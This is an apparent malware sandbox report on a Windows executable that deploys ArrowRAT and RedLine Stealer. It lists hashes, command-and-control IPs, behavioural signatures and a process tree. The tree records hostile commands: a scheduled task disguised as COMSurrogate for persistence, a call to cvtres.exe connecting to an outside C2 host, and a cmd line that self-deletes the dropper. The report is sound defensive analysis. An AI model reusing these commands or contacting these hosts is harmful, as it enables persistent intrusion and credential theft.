Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
82s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
11/11/2022, 18:30
Static task
static1
Behavioral task
behavioral1
Sample
6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe
Resource
win10v2004-20220901-en
General
-
Target
6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe
-
Size
18.4MB
-
MD5
464502cbaae7b9ed1cd6da844d38ba86
-
SHA1
30dd42539cbfad04564f9db45ca40f2b9e81546c
-
SHA256
6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4
-
SHA512
e74b45702eeaca95bc6c9f2aeea8a5958a425dc1f45ecfb127e286a39eb668243b41e56c705ae5fe7a72ff1ab691948adf29ddd6de18509421fa415647a36b59
-
SSDEEP
98304:2pgc9WBd2/ojIbrK51bnqvMwqwWhWznbdyxDDFC4B14d+iXLfg0rf2a33OXA7zTg:2pgnBkbYEMUWIzbdyxDDFCXpZU
Malware Config
Extracted
arrowrat
Client
213.239.219.58:1337
nPxRArUjc
Extracted
redline
@NoxyCloud
85.192.63.57:34210
-
auth_value
20dc074852db65a2b74addf964cf576e
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral1/memory/4444-245-0x0000000000400000-0x0000000000428000-memory.dmp family_redline -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4384 created 2476 4384 Quoko tace wesa.exe 60 -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
pid Process 4304 MRH.exe 4384 Quoko tace wesa.exe -
Modifies Installed Components in the registry 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation MRH.exe -
Loads dropped DLL 1 IoCs
pid Process 4384 Quoko tace wesa.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: explorer.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2564 set thread context of 992 2564 6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe 81 PID 4384 set thread context of 4484 4384 Quoko tace wesa.exe 110 PID 4484 set thread context of 2900 4484 InstallUtil.exe 112 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2948 schtasks.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-929662420-1054238289-2961194603-1000\{26460135-AA43-4D36-BE5E-18246578A6E5} explorer.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings InstallUtil.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ explorer.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2768 PING.EXE -
Suspicious behavior: EnumeratesProcesses 44 IoCs
pid Process 1508 AcroRd32.exe 1508 AcroRd32.exe 1508 AcroRd32.exe 1508 AcroRd32.exe 1508 AcroRd32.exe 1508 AcroRd32.exe 1508 AcroRd32.exe 1508 AcroRd32.exe 1508 AcroRd32.exe 1508 AcroRd32.exe 1508 AcroRd32.exe 1508 AcroRd32.exe 1508 AcroRd32.exe 1508 AcroRd32.exe 1508 AcroRd32.exe 1508 AcroRd32.exe 1508 AcroRd32.exe 1508 AcroRd32.exe 1508 AcroRd32.exe 1508 AcroRd32.exe 4304 MRH.exe 4304 MRH.exe 4304 MRH.exe 4304 MRH.exe 4304 MRH.exe 4304 MRH.exe 4304 MRH.exe 4304 MRH.exe 4304 MRH.exe 4304 MRH.exe 4384 Quoko tace wesa.exe 4384 Quoko tace wesa.exe 4384 Quoko tace wesa.exe 4384 Quoko tace wesa.exe 4384 Quoko tace wesa.exe 4384 Quoko tace wesa.exe 4384 Quoko tace wesa.exe 4384 Quoko tace wesa.exe 4384 Quoko tace wesa.exe 4384 Quoko tace wesa.exe 4384 Quoko tace wesa.exe 4384 Quoko tace wesa.exe 4484 InstallUtil.exe 4484 InstallUtil.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
description pid Process Token: SeDebugPrivilege 4484 InstallUtil.exe Token: SeShutdownPrivilege 2300 explorer.exe Token: SeCreatePagefilePrivilege 2300 explorer.exe Token: SeShutdownPrivilege 2300 explorer.exe Token: SeCreatePagefilePrivilege 2300 explorer.exe Token: SeShutdownPrivilege 2300 explorer.exe Token: SeCreatePagefilePrivilege 2300 explorer.exe Token: SeShutdownPrivilege 2300 explorer.exe Token: SeCreatePagefilePrivilege 2300 explorer.exe Token: SeShutdownPrivilege 2300 explorer.exe Token: SeCreatePagefilePrivilege 2300 explorer.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
pid Process 1508 AcroRd32.exe 2300 explorer.exe 2300 explorer.exe 2300 explorer.exe 2300 explorer.exe 2300 explorer.exe 2300 explorer.exe -
Suspicious use of SendNotifyMessage 8 IoCs
pid Process 2300 explorer.exe 2300 explorer.exe 2300 explorer.exe 2300 explorer.exe 2300 explorer.exe 2300 explorer.exe 2300 explorer.exe 2300 explorer.exe -
Suspicious use of SetWindowsHookEx 9 IoCs
pid Process 992 InstallUtil.exe 1508 AcroRd32.exe 1508 AcroRd32.exe 1508 AcroRd32.exe 1508 AcroRd32.exe 1508 AcroRd32.exe 1508 AcroRd32.exe 4484 InstallUtil.exe 1812 StartMenuExperienceHost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2564 wrote to memory of 992 2564 6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe 81 PID 2564 wrote to memory of 992 2564 6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe 81 PID 2564 wrote to memory of 992 2564 6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe 81 PID 2564 wrote to memory of 992 2564 6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe 81 PID 2564 wrote to memory of 992 2564 6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe 81 PID 2564 wrote to memory of 992 2564 6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe 81 PID 2564 wrote to memory of 992 2564 6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe 81 PID 992 wrote to memory of 1508 992 InstallUtil.exe 82 PID 992 wrote to memory of 1508 992 InstallUtil.exe 82 PID 992 wrote to memory of 1508 992 InstallUtil.exe 82 PID 1508 wrote to memory of 952 1508 AcroRd32.exe 87 PID 1508 wrote to memory of 952 1508 AcroRd32.exe 87 PID 1508 wrote to memory of 952 1508 AcroRd32.exe 87 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 380 952 RdrCEF.exe 90 PID 952 wrote to memory of 4264 952 RdrCEF.exe 89 PID 952 wrote to memory of 4264 952 RdrCEF.exe 89 PID 952 wrote to memory of 4264 952 RdrCEF.exe 89 PID 952 wrote to memory of 4264 952 RdrCEF.exe 89 PID 952 wrote to memory of 4264 952 RdrCEF.exe 89 PID 952 wrote to memory of 4264 952 RdrCEF.exe 89 PID 952 wrote to memory of 4264 952 RdrCEF.exe 89 PID 952 wrote to memory of 4264 952 RdrCEF.exe 89 PID 952 wrote to memory of 4264 952 RdrCEF.exe 89 PID 952 wrote to memory of 4264 952 RdrCEF.exe 89
Processes
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵PID:2476
-
C:\Users\Admin\AppData\Local\Temp\6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe"C:\Users\Admin\AppData\Local\Temp\6c90b6acb49fff4969b5f5fabde4b4fea363e1902ac675ba02e7ad325804b7d4.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2564 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"2⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:992 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Invoice.pdf"3⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1508 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140434⤵
- Suspicious use of WriteProcessMemory
PID:952 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=9B1B4361A50C21DF25A7FABE68305572 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=9B1B4361A50C21DF25A7FABE68305572 --renderer-client-id=2 --mojo-platform-channel-handle=1756 --allow-no-sandbox-job /prefetch:15⤵PID:4264
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=788D1D1BBE16AB2A137559086BD50A0F --mojo-platform-channel-handle=1744 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:380
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=281E355ACFE8D4C1AF03FB24F6C059C1 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=281E355ACFE8D4C1AF03FB24F6C059C1 --renderer-client-id=4 --mojo-platform-channel-handle=2324 --allow-no-sandbox-job /prefetch:15⤵PID:4580
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0A78EE24E75F23A17C9BBAE7AAD8B941 --mojo-platform-channel-handle=2568 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:4948
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5CF4FE0910D7224F29E8FA99DB67877F --mojo-platform-channel-handle=2800 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:3708
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=7A8D0A0C7A05632F707DD1AC5504DB59 --mojo-platform-channel-handle=2772 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:1564
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\MRH.exe"C:\Users\Admin\AppData\Local\Temp\MRH.exe" 03⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
PID:4304 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /tn COMSurrogate /f /sc onlogon /rl highest /tr "C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe"4⤵
- Creates scheduled task(s)
PID:2948
-
-
C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe"C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe" 04⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4384 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵PID:4588
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵PID:4908
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵PID:4056
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4484 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"6⤵
- Modifies Installed Components in the registry
- Enumerates connected drives
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2300
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 213.239.219.58 1337 nPxRArUjc6⤵PID:2900
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\MRH.exe"4⤵PID:3692
-
C:\Windows\SysWOW64\chcp.comchcp 650015⤵PID:3392
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
PID:2768
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ROR.exe"C:\Users\Admin\AppData\Local\Temp\ROR.exe" 03⤵PID:3084
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"4⤵PID:1896
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"4⤵PID:4444
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5104
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:1812
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:344
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
717B
MD5ec8ff3b1ded0246437b1472c69dd1811
SHA1d813e874c2524e3a7da6c466c67854ad16800326
SHA256e634c2d1ed20e0638c95597adf4c9d392ebab932d3353f18af1e4421f4bb9cab
SHA512e967b804cbf2d6da30a532cbc62557d09bd236807790040c6bee5584a482dc09d724fc1d9ac0de6aa5b4e8b1fff72c8ab3206222cc2c95a91035754ac1257552
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize192B
MD53ec90b352d8840c7a9ac3d1c6069e966
SHA1b13c9af8657c7d832eefdb2317397c445234e420
SHA2569eecbc2c89740bdc0497ebcc0350e58de39a7c392c7eda811b55736ae79ce552
SHA51253cf4274430f423e6628c20d28ae2b1c52c344afb6458560d2d60897bda54c766859a0a4d7ca4d491cbc44dca63f8d25d5ba43fed765c1bbaacf2548e46e3087
-
Filesize
259KB
MD594aafe6b249b7f529f9d66a6f7d0b80e
SHA1a83eee4aa9c936a8e423c4b2b7d2b1036a9a0c44
SHA25641c631caa7c9e95166917bec39627c488400d180622e4b2bb3a3629732692b54
SHA512e94befd6c2462bbab13e0e66569c78d34d075f15a9923713f9e72bbd7f791103ef20161b7f830a9ad1f2745ccd9e60bbbe7540f87c025d3be4b0dba3d546d5cb
-
Filesize
163KB
MD55441d36f8dcfdd31e75562b380bea7a8
SHA170053ce7491743efacaa4b40f452efb3f32df4e8
SHA25658098a6f25d3fb423b49a97cf917a406c5841d7ac792ef04ecb9646f5629baf3
SHA51206a19ace54e2ccb25faaba3dce7a4b72010d1002efbd5d3e1cab1f23493dd8ada55803e9cd695a79c6030204224a84c5192b334b2e8c1007713e1f472f645bbe
-
Filesize
1.9MB
MD518585735c8866b21e2723a6f020bafd0
SHA1afb5b2c9d5ca57501835b0c56fd97b0641f01d88
SHA256e9c817d02acaf2fbb59a0a44be05dbb284ee622f50b2e2a598daac8bfb564672
SHA51288516af4bbbd9562a9ae9840124c6f9f1402f9a15a0ace5e2413023bbd80c37aa441cc39b8b48f8ca58f4192273e16cd590cd2e9e9a4298f6ed5b0497d54e6b8
-
Filesize
1.9MB
